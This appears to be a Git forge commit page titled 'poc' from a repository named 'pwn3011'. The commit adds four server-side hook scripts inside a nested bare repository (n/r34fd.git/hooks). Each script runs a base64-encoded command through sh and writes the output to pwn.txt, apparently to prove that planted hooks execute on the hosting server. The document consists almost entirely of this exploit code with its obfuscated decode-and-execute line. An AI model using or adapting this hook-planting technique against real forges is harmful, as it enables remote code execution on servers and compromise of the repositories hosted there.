This website works better with JavaScript
Home
Esplora
Aiuto
Registrati
Accedi
pwn3011
/
w96f1
Segui
1
Vota
0
Forka
0
File
Problemi
0
Pull Requests
0
Wiki
Sfoglia il codice sorgente
poc
x
1 mese fa
parent
57d71764a8
commit
0c00f5fa7d
4 ha cambiato i file
con
8 aggiunte
e
0 eliminazioni
Visualizzazione separata
Mostra Diff Stats
2
0
n/r34fd.git/hooks/post-receive
2
0
n/r34fd.git/hooks/post-update
2
0
n/r34fd.git/hooks/pre-receive
2
0
n/r34fd.git/hooks/update
+ 2
- 0
n/r34fd.git/hooks/post-receive
Vedi File
@@ -0,0 +1,2 @@
+#!/bin/sh
+echo '$(echo 'aWQ=' | base64 -d | sh)' > pwn.txt
+ 2
- 0
n/r34fd.git/hooks/post-update
Vedi File
@@ -0,0 +1,2 @@
+#!/bin/sh
+echo '$(echo 'aWQ=' | base64 -d | sh)' > pwn.txt
+ 2
- 0
n/r34fd.git/hooks/pre-receive
Vedi File
@@ -0,0 +1,2 @@
+#!/bin/sh
+echo '$(echo 'aWQ=' | base64 -d | sh)' > pwn.txt
+ 2
- 0
n/r34fd.git/hooks/update
Vedi File
@@ -0,0 +1,2 @@
+#!/bin/sh
+echo '$(echo 'aWQ=' | base64 -d | sh)' > pwn.txt